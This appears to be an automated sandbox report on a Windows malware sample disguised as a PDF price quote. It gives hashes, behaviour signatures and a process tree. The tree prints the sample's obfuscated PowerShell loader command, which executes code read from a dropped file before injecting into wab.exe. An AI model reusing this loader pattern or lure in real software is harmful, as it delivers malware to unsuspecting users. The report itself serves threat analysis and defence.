Overview

overview

5

Static

static

1

Qoute_EXW_...df.exe

windows7-x64

5

Qoute_EXW_...df.exe

windows10-2004-x64

3

Analysis

  • max time kernel
    141s
  • max time network
    95s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    19/08/2024, 13:26

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Qoute_EXW_prices_43GJI_pdf.exe

  • Size

    713KB

  • MD5

    857be0d54f844d0b99341fcb38fd7c00

  • SHA1

    a42bb0bbde545d4a94423175a1c9ed6feca461b0

  • SHA256

    b089218dc7ac4e96a6a9bf13dc51f88d082cc15596692af64724f508719e60a0

  • SHA512

    049615cb7171e40a59f5549fedf819ef45663b9beef0f77c69e97f00f2b607db4a05b8f25f380af1d9e04f642bee293b74752d41dcae08994cdd3d3fda920ce2

  • SSDEEP

    12288:46qnCZGZwF0g7A8eYnPM0mERiFa/2XAUoChkXRkMQvfVDldLGSq4W82:OCcaD7A8pPmEU3XHJyXRcvdDNq4Wl

Score
5/10
discoveryexecution

Malware Config

Signatures

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Qoute_EXW_prices_43GJI_pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\Qoute_EXW_prices_43GJI_pdf.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle minimized " $nephelite=Get-Content 'C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Stencilling.Ass243';$Kurrajong=$nephelite.SubString(56568,3);.$Kurrajong($nephelite)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:480
      • C:\Program Files (x86)\windows mail\wab.exe
        "C:\Program Files (x86)\windows mail\wab.exe"
        3⤵
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        PID:2384

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Kolorimetri.She17
    Filesize

    377KB

    MD5

    2c2dd8cd3a8e9d59a9329f41de07faf5

    SHA1

    5b43e2c03f458531b56d50404cf4a6095632f296

    SHA256

    c04a936ca71dd30413ba86100ed0fa5a5ba5d73609e778a351314504137a9b15

    SHA512

    5358a19aa964dc359efebe07a871ad58bdf85e15e784d55c57da7cb74590f9e7d5da5f126a0ab6fe1e28fcc2af297fa45f98b0d019544d0a8735a60868dcae25

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\belizerens\Anisosepalous\dagbrkninger\Stencilling.Ass243
    Filesize

    55KB

    MD5

    6d1f78dce389501cbce9c49abdb72308

    SHA1

    20d5e675fadb508978d1ca91d79f7bd96091a8ad

    SHA256

    31600f74bde7637dca69ae3c61c5abfbe2aebf84760afdf8ad410574e6d3f49f

    SHA512

    b3b7d9fae878e5a2302158a899b0620efbb63dbdb26ae3f26b2f4712192b348241126995f92fb6c11a7add82f83fd7f53971a93ba604e028205f108d2d80b431

    Download Submit

  • memory/480-12-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-18-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-8-0x0000000074191000-0x0000000074192000-memory.dmp

    Filesize

    4KB

    Download

  • memory/480-10-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-15-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-16-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-9-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-11-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-19-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-20-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-21-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-22-0x0000000074190000-0x000000007473B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/480-24-0x0000000006510000-0x000000000BFEF000-memory.dmp

    Filesize

    90.9MB

    Download

  • memory/2384-25-0x0000000000DF0000-0x0000000001E52000-memory.dmp

    Filesize

    16.4MB

    Download